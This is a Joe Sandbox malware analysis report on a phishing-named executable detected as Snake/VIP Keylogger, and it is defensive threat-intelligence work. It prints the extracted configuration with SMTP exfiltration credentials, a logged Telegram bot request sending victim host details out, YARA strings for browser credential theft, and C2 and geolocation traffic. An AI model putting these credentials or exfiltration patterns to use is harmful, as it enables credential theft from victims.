Edit tour

Windows Analysis Report
Request for Quotation Plug Valve.exe

Overview

General Information

Sample name:	Request for Quotation Plug Valve.exe
Analysis ID:	1529007
MD5:	fa1c425a44a073cec7f36210a6d7c3e6
SHA1:	70f4f24c7d4dd4bddfe2fa711f73d8c952be7d5b
SHA256:	181b41addb05b81a4246bc0dfe801d408c7478322cca039b66e91fd0d37c4f47
Tags:	exe
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Request for Quotation Plug Valve.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe" MD5: FA1C425A44A073CEC7F36210A6D7C3E6)

Request for Quotation Plug Valve.exe (PID: 6456 cmdline: "C:\Users\user\Desktop\Request for Quotation Plug Valve.exe" MD5: FA1C425A44A073CEC7F36210A6D7C3E6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4707717001.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4703404877.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d363:$a1: get_encryptedPassword 0x2d670:$a2: get_encryptedUsername 0x2d181:$a3: get_timePasswordChanged 0x2d27c:$a4: get_passwordField 0x2d379:$a5: set_encryptedPassword 0x2ea0a:$a7: get_logins 0x2e96d:$a10: KeyLoggerEventArgs 0x2e5d2:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000001.00000002.2250478185.0000000003839000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2ded3:$a1: get_encryptedPassword 0x70ef3:$a1: get_encryptedPassword 0xb3d13:$a1: get_encryptedPassword 0x2e1e0:$a2: get_encryptedUsername 0x71200:$a2: get_encryptedUsername 0xb4020:$a2: get_encryptedUsername 0x2dcf1:$a3: get_timePasswordChanged 0x70d11:$a3: get_timePasswordChanged 0xb3b31:$a3: get_timePasswordChanged 0x2ddec:$a4: get_passwordField 0x70e0c:$a4: get_passwordField 0xb3c2c:$a4: get_passwordField 0x2dee9:$a5: set_encryptedPassword 0x70f09:$a5: set_encryptedPassword 0xb3d29:$a5: set_encryptedPassword 0x2f57a:$a7: get_logins 0x7259a:$a7: get_logins 0xb53ba:$a7: get_logins 0x2f4dd:$a10: KeyLoggerEventArgs 0x724fd:$a10: KeyLoggerEventArgs 0xb531d:$a10: KeyLoggerEventArgs
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6620	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x133a8:$a1: get_encryptedPassword 0x136ab:$a2: get_encryptedUsername 0x131d0:$a3: get_timePasswordChanged 0x132cb:$a4: get_passwordField 0x133be:$a5: set_encryptedPassword 0x15836:$a7: get_logins 0x15799:$a10: KeyLoggerEventArgs 0x15402:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Request for Quotation Plug Valve.exe PID: 6456	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x94145:$a1: get_encryptedPassword 0x94448:$a2: get_encryptedUsername 0x93f6d:$a3: get_timePasswordChanged 0x94068:$a4: get_passwordField 0x9415b:$a5: set_encryptedPassword 0x965d3:$a7: get_logins 0x96536:$a10: KeyLoggerEventArgs 0x9619f:$a11: KeyLoggerEventArgsEventHandler
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b763:$a1: get_encryptedPassword 0x2ba70:$a2: get_encryptedUsername 0x2b581:$a3: get_timePasswordChanged 0x2b67c:$a4: get_passwordField 0x2b779:$a5: set_encryptedPassword 0x2ce0a:$a7: get_logins 0x2cd6d:$a10: KeyLoggerEventArgs 0x2c9d2:$a11: KeyLoggerEventArgsEventHandler
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d563:$a1: get_encryptedPassword 0x2d870:$a2: get_encryptedUsername 0x2d381:$a3: get_timePasswordChanged 0x2d47c:$a4: get_passwordField 0x2d579:$a5: set_encryptedPassword 0x2ec0a:$a7: get_logins 0x2eb6d:$a10: KeyLoggerEventArgs 0x2e7d2:$a11: KeyLoggerEventArgsEventHandler
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39516:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38bb9:$a3: \Google\Chrome\User Data\Default\Login Data 0x38e16:$a4: \Orbitum\User Data\Default\Login Data 0x397f5:$a5: \Kometa\User Data\Default\Login Data
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b316:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a9b9:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ac16:$a4: \Orbitum\User Data\Default\Login Data 0x3b5f5:$a5: \Kometa\User Data\Default\Login Data
1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c34a:$s1: UnHook 0x2c351:$s2: SetHook 0x2c359:$s3: CallNextHook 0x2c366:$s4: _hook
3.2.Request for Quotation Plug Valve.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e14a:$s1: UnHook 0x2e151:$s2: SetHook 0x2e159:$s3: CallNextHook 0x2e166:$s4: _hook
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2b763:$a1: get_encryptedPassword 0x2ba70:$a2: get_encryptedUsername 0x2b581:$a3: get_timePasswordChanged 0x2b67c:$a4: get_passwordField 0x2b779:$a5: set_encryptedPassword 0x2ce0a:$a7: get_logins 0x2cd6d:$a10: KeyLoggerEventArgs 0x2c9d2:$a11: KeyLoggerEventArgsEventHandler
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39516:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38bb9:$a3: \Google\Chrome\User Data\Default\Login Data 0x38e16:$a4: \Orbitum\User Data\Default\Login Data 0x397f5:$a5: \Kometa\User Data\Default\Login Data
1.2.Request for Quotation Plug Valve.exe.387c990.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c34a:$s1: UnHook 0x2c351:$s2: SetHook 0x2c359:$s3: CallNextHook 0x2c366:$s4: _hook
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d563:$a1: get_encryptedPassword 0x70383:$a1: get_encryptedPassword 0x2d870:$a2: get_encryptedUsername 0x70690:$a2: get_encryptedUsername 0x2d381:$a3: get_timePasswordChanged 0x701a1:$a3: get_timePasswordChanged 0x2d47c:$a4: get_passwordField 0x7029c:$a4: get_passwordField 0x2d579:$a5: set_encryptedPassword 0x70399:$a5: set_encryptedPassword 0x2ec0a:$a7: get_logins 0x71a2a:$a7: get_logins 0x2eb6d:$a10: KeyLoggerEventArgs 0x7198d:$a10: KeyLoggerEventArgs 0x2e7d2:$a11: KeyLoggerEventArgsEventHandler 0x715f2:$a11: KeyLoggerEventArgsEventHandler
1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e14a:$s1: UnHook 0x70f6a:$s1: UnHook 0x2e151:$s2: SetHook 0x70f71:$s2: SetHook 0x2e159:$s3: CallNextHook 0x70f79:$s3: CallNextHook 0x2e166:$s4: _hook 0x70f86:$s4: _hook
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d563:$a1: get_encryptedPassword 0x70583:$a1: get_encryptedPassword 0xb33a3:$a1: get_encryptedPassword 0x2d870:$a2: get_encryptedUsername 0x70890:$a2: get_encryptedUsername 0xb36b0:$a2: get_encryptedUsername 0x2d381:$a3: get_timePasswordChanged 0x703a1:$a3: get_timePasswordChanged 0xb31c1:$a3: get_timePasswordChanged 0x2d47c:$a4: get_passwordField 0x7049c:$a4: get_passwordField 0xb32bc:$a4: get_passwordField 0x2d579:$a5: set_encryptedPassword 0x70599:$a5: set_encryptedPassword 0xb33b9:$a5: set_encryptedPassword 0x2ec0a:$a7: get_logins 0x71c2a:$a7: get_logins 0xb4a4a:$a7: get_logins 0x2eb6d:$a10: KeyLoggerEventArgs 0x71b8d:$a10: KeyLoggerEventArgs 0xb49ad:$a10: KeyLoggerEventArgs
1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e14a:$s1: UnHook 0x7116a:$s1: UnHook 0xb3f8a:$s1: UnHook 0x2e151:$s2: SetHook 0x71171:$s2: SetHook 0xb3f91:$s2: SetHook 0x2e159:$s3: CallNextHook 0x71179:$s3: CallNextHook 0xb3f99:$s3: CallNextHook 0x2e166:$s4: _hook 0x71186:$s4: _hook 0xb3fa6:$s4: _hook
Click to see the 26 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 208.91.199.223, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe, Initiated: true, ProcessId: 6456, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49875

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T15:10:22.337547+0200	2803305	3	Unknown Traffic	192.168.2.6	49761	188.114.96.3	443	TCP
2024-10-08T15:10:23.435351+0200	2803305	3	Unknown Traffic	192.168.2.6	49769	188.114.96.3	443	TCP
2024-10-08T15:10:32.163088+0200	2803305	3	Unknown Traffic	192.168.2.6	49831	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-08T15:10:20.736990+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49737	193.122.130.0	80	TCP
2024-10-08T15:10:21.752732+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49737	193.122.130.0	80	TCP
2024-10-08T15:10:22.861976+0200	2803274	2	Potentially Bad Traffic	192.168.2.6	49765	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Request for Quotation Plug Valve.exe

Avira: detected

Found malware configuration

Source: 00000003.00000002.4707717001.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587", "Version": "4.4"}
Source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cashisok@pooonghanbd.com", "Password": "QvGP%z%2", "Host": "us2.smtp.mailhostbox.com", "Port": "587"}

Multi AV Scanner detection for submitted file

Source: Request for Quotation Plug Valve.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Request for Quotation Plug Valve.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Request for Quotation Plug Valve.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49838 version: TLS 1.2

Source: Request for Quotation Plug Valve.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 02ABF8E9h	3_2_02ABF631
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 02ABFD41h	3_2_02ABFA88
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E0D0Dh	3_2_068E0B30
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E1697h	3_2_068E0B30
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E31E0h	3_2_068E2DC8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E2C19h	3_2_068E2968
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EE959h	3_2_068EE6B0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EE0A9h	3_2_068EDE00
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EE501h	3_2_068EE258
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EF661h	3_2_068EF3B8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EEDB1h	3_2_068EEB08
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EF209h	3_2_068EEF60
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068ECF49h	3_2_068ECCA0
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068ED3A1h	3_2_068ED0F8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EFAB9h	3_2_068EF810
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_068E0040
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068EDC51h	3_2_068ED9A8
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E31E0h	3_2_068E2DBF
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068E31E0h	3_2_068E310E
Source: C:\Users\user\Desktop\Request for Quotation Plug Valve.exe	Code function: 4x nop then jmp 068ED7F9h	3_2_068ED550

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.Request for Quotation Plug Valve.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.387c990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Request for Quotation Plug Valve.exe.3839970.4.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.6:49875 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:688098%0D%0ADate%20and%20Time:%2008/10/2024%20/%2023:13:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20688098%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49765 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49737 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49769 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49831 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49761 -> 188.114.96.3:443

Source: global traffic

TCP traffic: 192.168.2.6:49875 -> 208.91.199.223:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
